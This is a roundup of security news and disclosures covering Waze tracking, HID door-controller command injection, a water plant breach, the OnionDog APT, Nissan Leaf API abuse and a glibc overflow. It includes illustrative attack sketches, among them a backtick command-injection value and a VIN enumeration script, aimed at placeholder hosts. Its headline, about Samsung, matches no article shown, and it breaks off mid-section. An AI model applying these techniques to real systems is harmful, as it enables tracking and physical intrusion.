Flaws in Samsung’s ‘Smart’ Home Let Hackers Unlock Doors and Set Off Fire Alarms

Credit: Andy Greenberg, Wired

Waze | Another way to track your moves

Millions of drivers use Waze, a Google-owned navigation app, to find the best, fastest route from point A to point B. And according to a new study, all of those people run the risk of having their movements tracked by hackers.

Researchers at the University of California-Santa Barbara recently discovered a Waze vulnerability that allowed them to create thousands of “ghost drivers” that can monitor the drivers around them—an exploit that could be used to track Waze users in real-time. They proved it to me by tracking my own movements around San Francisco and Las Vegas over a three-day period.

“It’s such a massive privacy problem,” said Ben Zhao, professor of computer science at UC-Santa Barbara, who led the research team.

Here’s how the exploit works. Waze’s servers communicate with phones using an SSL encrypted connection, a security precaution meant to ensure that Waze’s computers are really talking to a Waze app on someone’s smartphone. Zhao and his graduate students discovered they could intercept that communication by getting the phone to accept their own computer as a go-between in the connection. Once in between the phone and the Waze servers, they could reverse-engineer the Waze protocol, learning the language that the Waze app uses to talk to Waze’s back-end app servers. With that knowledge in hand, the team was able to write a program that issued commands directly to Waze servers, allowing the researchers to populate the Waze system with thousands of “ghost cars”—cars that could cause a fake traffic jam or, because Waze is a social app where drivers broadcast their locations, monitor all the drivers around them.
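To make that last step concrete, here is a minimal sketch, in Python, of what a “ghost car” script could look like once the protocol has been reverse-engineered. The endpoint and field names below are hypothetical stand-ins; the researchers did not publish the actual Waze protocol.

import requests

# Hypothetical endpoint and fields standing in for the reverse-engineered
# (and unpublished) Waze protocol.
API = "https://waze.example.invalid/position"

def report_position(ghost_id, lat, lon):
    # Each ghost car periodically reports a fabricated GPS position,
    # exactly as a real phone running the app would.
    payload = {"id": ghost_id, "lat": lat, "lon": lon, "speed_mph": 25}
    return requests.post(API, json=payload, timeout=5)

# A few thousand of these, spread across a grid of map tiles, can observe
# every real driver the ghosts can "see".
for i in range(1000):
    report_position(f"ghost-{i}", 36.1699, -115.1398)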

The attack is similar to one conducted by Israeli university students two years ago, who used emulators to send traffic bots into Waze and create the appearance of a traffic jam. But an emulator, which pretends to be a phone, can only create the appearance of a few vehicles in the Waze system. The UC-Santa Barbara team, on the other hand, could run scripts on a laptop that created thousands of virtual vehicles in the Waze system that can be sent into multiple grids on a map for complete surveillance of a given area.

In a test of the discovery, Zhao and his graduate students tried the hack on a member of their team (with his permission).

“He drove 20 to 30 miles and we were able to track his location almost the whole time,” Zhao told me. “He stopped at gas stations and a hotel.”

Last week, I tested the Waze vulnerability myself, to see how successfully the UC-Santa Barbara team could track me over a three-day period. I told them I’d be in Las Vegas and San Francisco, and where I was staying—the kind of information a snoopy stalker might know about someone he or she wanted to track. Then, their ghost army tried to keep tabs on where I went.

Users could be tracked right now and never know it.

– Ben Zhao, UC-Santa Barbara computer science professor

The researchers caught my movements on three occasions, including when I took a taxi to downtown Las Vegas for dinner.

And they caught me commuting to work on the bus in San Francisco. (Though they lost me when I went underground to take the subway.)

The security researchers were only able to track me while I was in a vehicle with Waze running in the foreground of my smartphone. Previously, they could track someone even if Waze was just running in the background of the phone. Waze, an Israeli start-up, was purchased by Google in 2013 for $1.1 billion. Zhao informed the security team at Google about the problem and made a version of the paper about their findings public last year. An update to the app in January of this year prevents it from broadcasting your location when the app is running in the background, an update that Waze described as an energy-saving feature. (So update your Waze app if you haven’t done so recently!)

“Waze constantly improves its mechanisms and tools to prevent abuse and misuse. To that end, Waze is regularly in contact with the security and privacy research community—we appreciate their help protecting our users,” said a Waze spokesperson in an emailed statement. “This group of researchers connected with us in 2014, and we have already addressed some of their claims, implementing safeguards in our system to protect the privacy of our users.”

The spokesperson said that “the concept of Waze is that we all work together to share information and impact the world around us” and that “users expect to offer certain information about their route in exchange for unparalleled navigation assistance.” Among the safeguards deployed by Waze is a “system of cloaking” so that a user’s location as displayed “from time to time within the Waze application does not represent such user’s actual, real time location.”


But those safeguards did not prevent real-time tracking in my case. The researchers sent me their tracking data minutes after my trips, with accurate time stamps for each of my locations, meaning this cloaking system doesn’t seem to work very well.

“Anyone could be doing this [tracking of Waze users] right now,” said Zhao. “It’s really hard to detect.”

Part of what allowed the researchers to track me so closely is the social nature of Waze and the fact that the app is designed to share users’ geolocation information with each other. The app shows you other Waze drivers on the road around you, along with their usernames and how fast they’re going. (Users can opt out of this by going invisible.) When I was in Vegas, the researchers simply populated ghost cars around the hotel I was staying at that were programmed to follow me once I was spotted.

“You could scale up to real-time tracking of millions of users with just a handful of servers,” Zhao told me. “If I wanted to, I could easily crawl all of the U.S. in real time. I have 50-100 servers, and could get more from [Amazon Web Services] and then I could track all of the drivers.”

Theoretically, a hacker could use this technique to go into the Waze system and download the activity of all the drivers using it. If they made the data public like the Ashley Madison hackers did, the public would suddenly have the opportunity to follow the movements of the over 50 million people who use Waze. If you know where someone lives, you would have a good idea of where to start tracking them.

Like the Israeli researchers, Zhao’s team was also able to easily create fake traffic jams. They were wary of interfering with real Waze users so they ran their experiments from 2 a.m. to 5 a.m. every night for two weeks, creating the appearance of heavy traffic and an accident on a remote road outside of Baird, Texas.

“No real humans were harmed or even interacted with,” said Zhao. They aborted the experiment twice after spotting real world drivers within 10 miles of their ghost traffic jam.

While Zhao defended the team’s decision to run the experiment live on Waze’s system, he admitted they were “very nervous” about initially making their paper about their findings public. They had approval from their IRB, a university ethics board; took precautions not to interfere with any real users; and notified Google’s security team about their findings. They are presenting their paper at MobiSys, a conference focused on mobile systems, at the end of June in Singapore.

“We needed to get this information out there,” said Zhao. “Sitting around and not telling the public and the users isn’t an option. They could be tracked right now and never know it.”

“This is bigger than Waze,” Zhao continued. The attack could work against any app, he said, turning its servers into an open system that an attacker can mine and manipulate. With Waze the attack is particularly sensitive because users’ location information is broadcast and can be downloaded, but the same attack on another app would let hackers download any information that users broadcast to other users, or flood the app with fake traffic.

“With a [dating app], you could flood an area with your own profile or robot profiles and basically ruin it for your area,” said Zhao. “We looked at a bunch of different apps and nearly all of them had this near-catastrophic vulnerability.”

The scary part, said Zhao, is that “we don’t know how to stop this.” He said that servers that interact with apps in general are not as robust against attack as those that are web-facing.

“Not being able to separate a real device from a program is a larger problem,” said Zhao. “It’s not cheap and it’s not easy to solve. Even if Google wanted to do something, it’s not trivial for them to solve. But I want them to get this on the radar screen and help try to solve the problem. If they lead and they help, this collective problem will be solved much faster than if they don’t.”

“Waze is building their platform to be social so that you can track people around you. By definition this is going to be possible,” said Jonathan Zdziarski, a smartphone forensic scientist, who reviewed the paper at my request. “The crowd sourced tools that are being used in these types of services definitely have these types of data vulnerabilities.”

Zdziarski said there are ways to prevent this kind of abuse, by for example, rate-limiting data requests. Zhao told me his team has been running its experiments since the spring of 2014, and Waze hasn’t blocked them, even though they have created the appearance of thousands of Waze users in a short period of time coming from just a few IP addresses.
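Rate limiting of the kind Zdziarski suggests is straightforward to sketch. Here is a minimal token-bucket limiter in Python; the per-client thresholds are illustrative assumptions, not anything Waze has described.

import time

class TokenBucket:
    # Allow roughly `rate` requests per second per client, with short
    # bursts up to `capacity`; anything beyond that is rejected.
    def __init__(self, rate=5.0, capacity=20):
        self.rate, self.capacity = rate, capacity
        self.tokens, self.last = float(capacity), time.monotonic()

    def allow(self):
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

buckets = {}  # one bucket per client IP

def permit(client_ip):
    # Thousands of queries in a short period from a handful of IPs --
    # the pattern described above -- would be cut off here.
    return buckets.setdefault(client_ip, TokenBucket()).allow()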

Waze’s spokesperson said the company is “examining the new issue raised by the researchers and will continue to take the necessary steps to protect the privacy of our users.”

In the meantime, if you need to use Waze to get around but are wary of being tracked, you do have one option: set your app to invisible mode. But beware, Waze turns off invisible mode every time you restart the app.

Full paper here.

Physical Backdoor | Remote Root Vulnerability in HID Door Controllers

If you’ve ever been inside an airport, university campus, hospital, government complex, or office building, you’ve probably seen one of HID’s brand of card readers standing guard over a restricted area. HID is one of the world’s largest manufacturers of access control systems and has become a ubiquitous part of many large companies’ physical security posture. Each one of those card readers is attached to a door controller behind the scenes, which is a device that controls all the functions of the door including locking and unlocking, schedules, alarms, etc.

In recent years, these door controllers have been given network interfaces so that they can be managed remotely. It is very handy for pushing out card database updates and schedules, but as with everything else on the network, there is a risk of remotely exploitable vulnerabilities. And in the case of physical security systems, that risk is more tangible than usual.

HID’s two flagship lines of door controllers are its VertX and Edge platforms. So that these controllers can be easily integrated into existing access control setups, they run a discoveryd service that responds to a particular UDP packet. A remote management system can broadcast a “discover” probe to port 4070, and all the door controllers on the network will respond with information such as their MAC address, device type, firmware version, and even a common name (like “North Exterior Door”). As far as I can tell, discovery is the only purpose this service needs to serve. It is not, however, its only function. For some reason, discoveryd also contains functionality for changing the blinking pattern of the status LED on the controller. This is accomplished by sending a “command_blink_on” packet to the discoveryd service with the number of times the LED should blink. Discoveryd then builds up a path to /mnt/apps/bin/blink and calls system() to run the blink program with that number as an argument.

And you can probably guess what comes next.

A command injection vulnerability exists in this function due to a lack of any sanitization on the user-supplied input that is fed to the system() call. Instead of a number of times to blink the LED, if we send a Linux command wrapped in backticks, like `id`, it will get executed by the Linux shell on the device. To make matters worse, the discovery service runs as root, so whatever command we send it will also be run as root, effectively giving us complete control over the device. Since the device in this case is a door controller, having complete control includes all of the alarm and locking functionality. This means that with a few simple UDP packets and no authentication whatsoever, you can permanently unlock any door connected to the controller. And you can do this in a way that makes it impossible for a remote management system to relock it. On top of that, because the discoveryd service responds to broadcast UDP packets, you can do this to every single door on the network at the same time!
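Both halves of the attack are easy to picture in code. In this Python sketch, the probe payload is a placeholder (the exact wire format isn’t given in this write-up), and the os.system() line mirrors the vulnerable pattern described above, since Python’s os.system(), like C’s system(), hands its string to /bin/sh.

import os
import socket

# 1. The attack surface: discoveryd listens for broadcast UDP on port 4070.
#    The real probe payload format is not published here; this is a placeholder.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(b"discover", ("255.255.255.255", 4070))

# 2. The flaw in essence: a shell command is built from the attacker-supplied
#    "blink count" and run as root, with no sanitization.
blink_arg = "`id`"  # a backtick-wrapped command instead of a number
os.system("/mnt/apps/bin/blink " + blink_arg)  # /bin/sh expands `id` first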

Needless to say, this is a potentially devastating bug. The Zero Day Initiative team worked with HID to see that it got fixed, and a patch is reportedly available now through HID’s partner portal, but I have not been able to verify that fix personally. It also remains to be seen just how quickly that patch will trickle down into customer deployments. TippingPoint customers have been protected ahead of a patch for this vulnerability since September 22, 2015 with Digital Vaccine filter 20820.

Credit:  Ricky Lawshae

Kemuri Water Company (KWC) | Hackers change chemical settings at water treatment plant

The unnamed water district had asked Verizon to assess its networks for indications of a security breach. The district said there was no evidence of unauthorized access, and the assessment was a proactive measure as part of ongoing efforts to keep its systems and networks healthy.

Verizon examined the company’s IT systems, which supported end users and corporate functions, as well as Operational Technology (OT) systems, which were behind the distribution, control and metering of the regional water supply.

The assessment found several high-risk vulnerabilities on the Internet-facing perimeter and said that the OT end relied heavily on antiquated computer systems running operating systems from 10 or more years ago.

Many critical IT and OT functions ran on a single IBM AS/400 system which the company described as its SCADA (Supervisory Control and Data Acquisition) platform. This system ran the water district’s valve and flow control application that was responsible for manipulating hundreds of programmable logic controllers (PLCs), and housed customer and billing information, as well as the company’s financials.

Interviews with the IT network team uncovered concerns surrounding recent suspicious cyber activity and it emerged that an unexplained pattern of valve and duct movements had occurred over the previous 60 days. These movements consisted of manipulating the PLCs that managed the amount of chemicals used to treat the water to make it safe to drink, as well as affecting the water flow rate, causing disruptions with water distribution, Verizon reported.

An analysis of the company’s internet traffic showed that some IP addresses previously linked to hacktivist attacks had connected to its online payment application.

Verizon said that it “found a high probability that any unauthorized access on the payment application would also expose sensitive information housed on the AS/400 system.” The investigation later showed that the hackers had exploited an easily identified vulnerability in the payment application, leading to the compromise of customer data. No evidence of fraudulent activity on the stolen accounts could be confirmed.

However, customer information was not the full extent of the breach. The investigation revealed that, using the same credentials found on the payment app webserver, the hackers were able to interface with the water district’s valve and flow control application, also running on the AS/400 system.

During these connections, they managed to manipulate the system to alter the amount of chemicals that went into the water supply and thus interfere with water treatment and production so that the recovery time to replenish water supplies increased. Thanks to alerts, the company was able to quickly identify and reverse the chemical and flow changes, largely minimizing the impact on customers. No clear motive for the attack was found, Verizon noted.

The company has since taken remediation measures to protect its systems.

In its concluding remarks on the incident, Verizon said: “Many issues like outdated systems and missing patches contributed to the data breach — the lack of isolation of critical assets, weak authentication mechanisms and unsafe practices of protecting passwords also enabled the threat actors to gain far more access than should have been possible.”

Acknowledging that the company’s alert functionality played a key role in detecting the chemical and flow changes, Verizon said that implementation of a “layered defense-in-depth strategy” could have detected the attack earlier, limiting its success or preventing it altogether.

About the attack [UPDATED]

A “hacktivist” group with ties to Syria compromised Kemuri Water Company’s computers after exploiting unpatched web vulnerabilities in its internet-facing customer payment portal, it is reported.

The hack – which involved SQL injection and phishing – exposed KWC’s ageing AS/400-based operational control system because login credentials for the AS/400 were stored on the front-end web server. This system, which was connected to the internet, managed the programmable logic controllers (PLCs) that regulated the valves and ducts controlling the flow of water through the system and of the chemicals used to treat it. Many critical IT and operational technology functions ran on a single AS/400 system, a team of computer forensic experts from Verizon subsequently concluded.

Verizon’s report describes the crossover: “Our endpoint forensic analysis revealed a linkage with the recent pattern of unauthorised crossover. Using the same credentials found on the payment app webserver, the threat actors were able to interface with the water district’s valve and flow control application, also running on the AS400 system. We also discovered four separate connections over a 60-day period, leading right up to our assessment. During these connections, the threat actors modified application settings with little apparent knowledge of how the flow control system worked. In at least two instances, they managed to manipulate the system to alter the amount of chemicals that went into the water supply and thus handicap water treatment and production capabilities so that the recovery time to replenish water supplies increased. Fortunately, based on alert functionality, KWC was able to quickly identify and reverse the chemical and flow changes, largely minimising the impact on customers. No clear motive for the attack was found.”

Verizon’s RISK Team uncovered evidence that the hacktivists had manipulated the valves controlling the flow of chemicals twice – though fortunately to no particular effect. It seems the activists lacked either the knowledge of SCADA systems or the intent to do any harm.

The same hack also resulted in the exposure of personal information of the utility’s 2.5 million customers. There’s no evidence that this has been monetized or used to commit fraud.

Nonetheless, the whole incident highlights the weaknesses in securing critical infrastructure systems, which often rely on ageing or hopelessly insecure setups.

More Information

Monzy Merza, Splunk’s director of cyber research and chief security evangelist, commented: “Dedicated and opportunistic attackers will continue to exploit low-hanging fruit present in outdated or unpatched systems. We continue to see infrastructure systems being targeted because they are generally under-resourced or believed to be out of band or not connected to the internet.”

“Beyond the clear need to invest in intrusion detection, prevention, patch management and analytics-driven security measures, this breach underscores the importance of actionable intelligence. Reports like Verizon’s are important sources of insight. Organisations must leverage this information to collectively raise the bar in security to better detect, prevent and respond to advanced attacks. Working collectively is our best route to getting ahead of attackers,” he added.

Reports that hackers have breached water treatment plants are rare but not unprecedented. For example, computer screenshots posted online back in November 2011 purported to show the user interface used to monitor and control equipment at the Water and Sewer Department of the City of South Houston, Texas, shared by hackers who claimed to have pwned its systems. The claim followed attempts by the US Department of Homeland Security to dismiss a separate water utility hack claim days earlier.

More recently hackers caused “serious damage” after breaching a German steel mill and wrecking one of its blast furnaces, according to a German government agency. Hackers got into production systems after tricking victims with spear phishing emails, said the agency.

Spear phishing also seems to have played a role in attacks involving the BlackEnergy malware against power utilities in Ukraine and other targets last December. The malware was used to steal user credentials as part of a complex attack that resulted in power outages that ultimately left more than 200,000 people temporarily without power on 23 December.

Credit:  watertechonline, theregister

OnionDog APT targets Critical Infrastructures and Industrial Control Systems (ICS)

The Helios Team at 360 SkyEye Labs revealed that a group named OnionDog has been infiltrating and stealing information from the energy, transportation and other infrastructure industries of Korean-language countries through the Internet.

OnionDog’s first activity can be traced back to October 2013, and in the following two years it was active only between late July and early September. Its Trojans set their own life cycles, 15 days on average, and its attacks are distinctly organized and objective-oriented.

OnionDog malware spreads by exploiting vulnerabilities in Hangul, an office suite popular in Korean-language countries, and it reaches network-isolated targets through a USB worm.

Targeting the infrastructure industry

OnionDog concentrated its efforts on infrastructure industries in Korean-language countries. In 2015 this organization mainly attacked harbors, VTS, subways, public transportation and other transportation systems. In 2014 it attacked many electric power and water resources corporations as well as other energy enterprises.

The Helios Team has found 96 groups of malicious code and 14 C&C domain names and IP addresses related to OnionDog. It first surfaced in October 2013 and was most active in the summers of the following years. Each Trojan set its own “active state” window, from compilation to the end of activity: the shortest was three days and the longest twenty-nine. The average life cycle is 15 days, which makes it more difficult for victim enterprises to notice and take action than malware that stays active for longer periods.

OnionDog’s attacks are mainly carried out in the form of spear-phishing emails. The early Trojan used icons and file numbers to create a fake HWP file (Hangul’s file format). Later on, the Trojan exploited a vulnerability in an upgraded version of Hangul, which embeds malicious code in a real HWP file. Once the file is opened, the vulnerability is triggered to download and activate the Trojan.

Since most infrastructure industries, such as the energy industry, generally adopt intranet isolation measures, OnionDog uses USB drives as a ferry to defeat the false sense of security that physical isolation provides. In the classic APT case of the Stuxnet virus, which broke into an Iranian nuclear facility, the virus used an employee’s USB disk to circumvent network isolation. OnionDog also used this channel, generating USB worms to infiltrate the target’s internal network.

“OCD-type” intensive organization

OnionDog’s malicious-code activity follows strict rules:

First, the malicious code has strict naming rules, starting with the path of the generated PDB (symbol file). For example, the path for the USB worm is APT-USB, and the path for the spear-phishing mail file is APT-WebServer;

When the OnionDog Trojan is successfully released, it communicates with a C&C (Trojan control server), downloads other malware, saves it in the %temp% folder, and uniformly uses “XXX_YYY.jpg” as the file name. These names have special meaning and usually point to the target.
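That file-naming convention is concrete enough to hunt for. Below is a small triage script in Python; the regular expression is an assumption inferred from the “XXX_YYY.jpg” description, so matches are leads to investigate, not verdicts.

import os
import re
import tempfile

# Pattern inferred from the "XXX_YYY.jpg" naming described above (assumption).
pattern = re.compile(r"^[A-Za-z0-9]+_[A-Za-z0-9]+\.jpg$")

tmp = tempfile.gettempdir()  # resolves %temp% on Windows
for name in os.listdir(tmp):
    if pattern.match(name):
        print("suspicious file:", os.path.join(tmp, name))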

All signs show that OnionDog has strict organization and arrangement across its attack time, target, vulnerability exploration and utilization, and malicious code. At the same time, it is very cautious about covering up its tracks.

In 2014, OnionDog used many fixed IPs in South Korea as its C&C sites. Of course, this does not mean the attacker is located in South Korea; these IPs could just be puppets and stepping stones. By 2015, OnionDog website communications were upgraded to Onion City across the board, which is so far a relatively advanced and covert method of network communication among APT attacks.

Onion City is a deep-web search engine that uses Tor2web proxy technology to reach the anonymous Tor network without requiring the Tor Browser. OnionDog uses Onion City to hide its Trojan control servers inside the Tor network.

In recent years, APT attacks on infrastructure facilities and large-scale enterprises have frequently emerged. Some that attack an industrial control system, such as Stuxnet, BlackEnergy and so on, can have devastating results. Some attacks are for the purpose of stealing information, such as those of the Lazarus hacker organization jointly revealed by Kaspersky, AlienVault Labs and Novetta, and of OnionDog, recently exposed by the 360 Helios team. These covert cybercrimes can cause similarly serious losses.

Credit:  helpnetsecurity

[CRITICAL] Nissan Leaf Can Be Hacked Via Web Browser From Anywhere In The World

What if a car could be controlled from a computer halfway around the world? Computer security researcher and hacker Troy Hunt has managed to do just that, via a web browser and an Internet connection, with an unmodified Nissan Leaf in another country. While so far the control was limited to the HVAC system, it’s a revealing demonstration of what’s possible.

Hunt writes that his experiment started when an attendee at a developer security conference where Hunt was presenting realized that his car, a Nissan Leaf, could be accessed via the internet using Nissan’s phone app. Using the same methods as the app itself, any other Nissan Leaf could be controlled as well, from pretty much anywhere.

Hunt made contact with another security researcher and Leaf-owner, Scott Helme. Helme is based in the UK, and Hunt is based in Australia, so they arranged an experiment that would involve Hunt controlling Helme’s LEAF from halfway across the world. Here’s the video they produced of that experiment:

As you can see, Hunt was able to access the Leaf in the UK, which wasn’t even on, and gather extensive data from the car’s computer about recent trips, distances of those trips (recorded, oddly, in yards), power usage information, charge state, and so on. He was also able to access the HVAC system to turn on the heater or A/C, and to turn on the heated seats.

It makes sense these functions would be the most readily available, because those are essentially the set of things possible via Nissan’s Leaf mobile app, which people use to heat up or cool their cars before they get to them, remotely check on the state of charge, and so on.

This app is the key to how the Leaf can be accessed via the web, since that’s exactly what the app does. The original (and anonymous) researcher found that by making his computer a proxy between the app and the internet, the requests made from the app to Nissan’s servers can be seen. Here’s what a request looks like:

GET https://[redacted].com/orchestration_1111/gdc/BatteryStatusRecordsRequest.php?RegionCode=NE&lg=no-NO&DCMID=&VIN=SJNFAAZE0U60XXXXX&tz=Europe/Paris&TimeFrom=2014-09-27T09:15:21

If you look at that request, you can see that it includes a tag for VIN, the Vehicle Identification Number (obfuscated here) of the car. Changing this VIN is really all you need to do to access any particular Leaf. Remember, by law, VINs are visible through the windshield of every car.

Hunt describes the process on his site, and notes some alarming details:

This is pretty self-explanatory if you read through the response; we’re seeing the battery status of his LEAF. But what got Jan’s attention is not that he could get the vehicle’s present status, but rather that the request his phone had issued didn’t appear to contain any identity data about his authenticated session.

In other words, he was accessing the API anonymously. It’s a GET request so there was nothing passed in the body nor was there anything like a bearer token in the request header. In fact, the only thing identifying his vehicle was the VIN which I’ve partially obfuscated in the URL above.

So, there’s no real security here to prevent accessing data on a LEAF, nor any attempt to verify the identity on either end of the connection.
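The whole exchange can be reproduced in a few lines. In the sketch below, the host is a placeholder (the real server name is redacted in the disclosure); the path and query parameters mirror the request shown above.

import requests

# Placeholder host -- the real server name was redacted in the disclosure.
BASE = "https://redacted.example.invalid/orchestration_1111/gdc"

params = {
    "RegionCode": "NE",
    "lg": "no-NO",
    "DCMID": "",
    "VIN": "SJNFAAZE0U60XXXXX",  # the VIN is the only identifier sent
    "tz": "Europe/Paris",
    "TimeFrom": "2014-09-27T09:15:21",
}

# No cookie, no bearer token, no signature: anyone who knows (or guesses)
# a VIN can request that car's battery status.
resp = requests.get(BASE + "/BatteryStatusRecordsRequest.php", params=params)
print(resp.status_code, resp.text)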

And it gets worse. Here, quoting from Hunt’s site, he’s using the name “Jan” to refer to the anonymous Leaf-owning hacker who discovered this:

But then he tried turning it on and observed this request:

GET https://[redacted].com/orchestration_1111/gdc/ACRemoteRequest.php?RegionCode=NE&lg=no-NO&DCMID=&VIN=SJNFAAZE0U60XXXXX&tz=Europe/Paris

That request returned this response:

{
    "status": 200,
    "message": "success",
    "userId": "******",
    "vin": "SJNFAAZE0U60****",
    "resultKey": "***************************"
}

This time, personal information about Jan was returned, namely his user ID which was a variation of his actual name. The VIN passed in the request also came back in the response and a result key was returned.

He then turned the climate control off and watched as the app issued this request:

GET https://[redacted].com/orchestration_1111/gdc/ACRemoteOffRequest.php?RegionCode=NE&lg=no-NO&DCMID=&VIN=SJNFAAZE0U60XXXXX&tz=Europe/Paris

All of these requests were made without an auth token of any kind; they were issued anonymously. Jan checked them by loading them up in Chrome as well and sure enough, the response was returned just fine. By now, it was pretty clear the API had absolutely zero access controls but the potential for invoking it under the identity of other vehicles wasn’t yet clear.

Even if you don’t understand the code, here’s what all that means: we have the ability to get personal data and control functions of the car from pretty much anywhere with a web connection, as long as you know the target car’s VIN.

Hunt proved this was possible after some work, using a tool to generate Leaf VINs (only the last 5 or 6 digits are actually different) and sending a request for battery status to those VINs. Soon, they got the proper response back. Hunt explains the significance:

This wasn’t Jan’s car; it was someone else’s LEAF. Our suspicion that the VIN was the only identifier required was confirmed and it became clear that there was a complete lack of auth on the service.

Of course it’s not just an issue related to retrieving vehicle status, remember the other APIs that can turn the climate control on or off. Anyone could potentially enumerate VINs and control the physical function of any vehicles that responded. That was a very serious issue. I reported it to Nissan the day after we discovered this (I wanted Jan to provide me with more information first), yet as of today – 32 days later – the issue remains unresolved. You can read the disclosure timeline further down but certainly there were many messages and a phone call over a period of more than four weeks and it’s only now that I’m disclosing publicly…
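The enumeration step Hunt describes amounts to a loop like the following sketch (same placeholder host as above). The success check on the response body is an assumption; Hunt simply watched for a response belonging to a real car.

import requests

BASE = "https://redacted.example.invalid/orchestration_1111/gdc"
PREFIX = "SJNFAAZE0U60"  # Leaf VINs share a long common prefix

def battery_status(vin):
    params = {"RegionCode": "NE", "lg": "no-NO", "DCMID": "",
              "VIN": vin, "tz": "Europe/Paris"}
    return requests.get(BASE + "/BatteryStatusRecordsRequest.php", params=params)

# Only the last five digits or so differ, so the search space is tiny.
for tail in range(100000):
    vin = f"{PREFIX}{tail:05d}"
    r = battery_status(vin)
    if r.ok and "success" in r.text:  # response marker assumed for illustration
        print("live VIN:", vin)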

(Now, just to be clear, this is not a how-to guide to mess with someone’s Leaf. You’ll note that the crucial server address has been redacted, so you can’t just type in those little segments of code and expect things to work.)

While at the moment, you can only control some HVAC functions and get access to the car’s charge state and driving history, that’s actually more worrying than you may initially think.

Not only is there the huge privacy issue of having your comings-and-goings logged and available, but if someone wanted to, they could crank the AC and drain the battery of a Leaf without too much trouble, stranding the owner somewhere.

There’s no provision for remote starting or unlocking at this point, but the Leaf is a fully drive-by-wire vehicle. It’s no coincidence that every fully autonomous car I’ve been in that’s made by Nissan has been on the LEAF platform; all of its major controls can be accessed electronically. For example, the steering wheel can be controlled (and was controlled, as I saw when visiting Nissan’s test facility) by the motors used for power steering assist, and it’s throttle (well, for electrons)-by-wire, and so on.

So, at this moment I don’t think anyone’s Leaf is in any danger other than having a drained battery and an interior like a refrigerator, but that’s not to say nothing else will be figured out. This is a huge security breach that Nissan needs to address as soon as possible. (I reached out to Nissan for comment on this story and will update as soon as I get one.)

So far, Nissan has not fixed this after at least 32 days, Hunt said. Here’s how he summarized his contact with Nissan:

I made multiple attempts over more than a month to get Nissan to resolve this and it was only after the Canadian email and French forum posts came to light that I eventually advised them I’d be publishing this post. Here’s the timeline (dates are Australian Eastern Standard time):

  • 23 Jan: Full details of the findings sent and acknowledged by Nissan Information Security Threat Intelligence in the U.S.A.
  • 30 Jan: Phone call with Nissan to fully explain how the risk was discovered and the potential ramifications followed up by an email with further details
  • 12 Feb: Sent an email to ask about progress and offer further support to which I was advised “We’re making progress toward a solution”
  • 20 Feb: Sent details as provided by the Canadian owner (including a link to the discussion of the risk in the public forum) and advised I’d be publishing this blog post “later next week”
  • 24 Feb: This blog published, 4 weeks and 4 days after first disclosure

All in all, I sent ten emails (there was some to-and-fro) and had one phone call. This morning I did hear back with a request to wait “a few weeks” before publishing, but given the extensive online discussions in public forums and the more than one-month lead time there’d already been, I advised I’d be publishing later that night and have not heard back since. I also invited Nissan to make any comments they’d like to include in this post when I contacted them on 20 Feb or provide any feedback on why they might not consider this a risk. However, there was nothing to that effect when I heard back from them earlier today, but I’ll gladly add an update later on if they’d like to contribute.

I do want to make it clear though that especially in the earlier discussions, Nissan handled this really well. It was easy to get in touch with the right people quickly and they made the time to talk and understand the issue. They were receptive and whilst I obviously would have liked to see this rectified quickly, compared to most ethical disclosure experiences security researchers have, Nissan was exemplary.

It’s great Nissan was “exemplary” but it would have been even better if they’d implemented at least some basic security before making their cars’ data and controls available over the internet.

Security via obscurity just isn’t going to cut it anymore, as Troy Hunt has proven through his careful and methodical work. I’m not sure why carmakers don’t seem to be taking this sort of security seriously, but it’s time for them to step up.

After all, doing so will save them from PR headaches like this, and the likely forthcoming stories your aunt will Facebook you about how the terrorists are going to make all the Leafs hunt us down like dogs.

Until they have to recharge, at least.

(Thanks, Matt and Brandon!)

Credit:  Jason Torchinsky

[CRITICAL] CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow

Have you ever been deep in the mines of debugging and suddenly realized that you were staring at something far more interesting than you were expecting? You are not alone! Recently a Google engineer noticed that their SSH client segfaulted every time they tried to connect to a specific host. That engineer filed a ticket to investigate the behavior and after an intense investigation we discovered the issue lay in glibc and not in SSH as we were expecting. Thanks to this engineer’s keen observation, we were able to determine that the issue could result in remote code execution. We immediately began an in-depth analysis of the issue to determine whether it could be exploited, and possible fixes. We saw this as a challenge, and after some intense hacking sessions, we were able to craft a full working exploit!

In the course of our investigation, and to our surprise, we learned that the glibc maintainers had previously been alerted to the issue via their bug tracker in July 2015 (bug). We couldn’t immediately tell whether the bug fix was underway, so we worked hard to make sure we understood the issue and then reached out to the glibc maintainers. To our delight, Florian Weimer and Carlos O’Donell of Red Hat had also been studying the bug’s impact, albeit completely independently! Due to the sensitive nature of the issue, the investigation, patch creation, and regression tests performed primarily by Florian and Carlos had continued “off-bug.”

This was an amazing coincidence, and thanks to their hard work and cooperation, we were able to translate both teams’ knowledge into a comprehensive patch and regression test to protect glibc users.

That patch is available here.

Issue Summary:

Our initial investigations showed that the issue affected all versions of glibc since 2.9. You should definitely update if you are on an older version, though. If the vulnerability is detected, machine owners may wish to take steps to mitigate the risk of an attack. The glibc DNS client-side resolver is vulnerable to a stack-based buffer overflow when the getaddrinfo() library function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack. Google has found some mitigations that may help prevent exploitation if you are not able to immediately patch your instance of glibc. The vulnerability relies on an oversized (2048+ bytes) UDP or TCP response, which is followed by another response that will overwrite the stack. Our suggested mitigation is to limit the size of responses accepted by the DNS resolver locally (e.g., via DNSMasq or similar programs), and to ensure that DNS queries are sent only to DNS servers that limit the response size for UDP responses with the truncation bit set.
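As a first triage step before applying the patch, you can ask the running C library for its version. This Python sketch assumes a glibc-based Linux system; note that distributions backport fixes, so a version in the affected range is a prompt to check your vendor’s advisories, not proof of vulnerability.

import ctypes

# Query the running glibc for its version string (glibc-based Linux only).
libc = ctypes.CDLL("libc.so.6")
libc.gnu_get_libc_version.restype = ctypes.c_char_p
version = libc.gnu_get_libc_version().decode()
print("glibc", version)

major, minor = (int(part) for part in version.split(".")[:2])
if (major, minor) >= (2, 9):
    # In the affected range per the advisory above -- but backported patches
    # won't change this string, so confirm against distro security notices.
    print("within the CVE-2015-7547 affected range; verify patch level")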

Technical information:

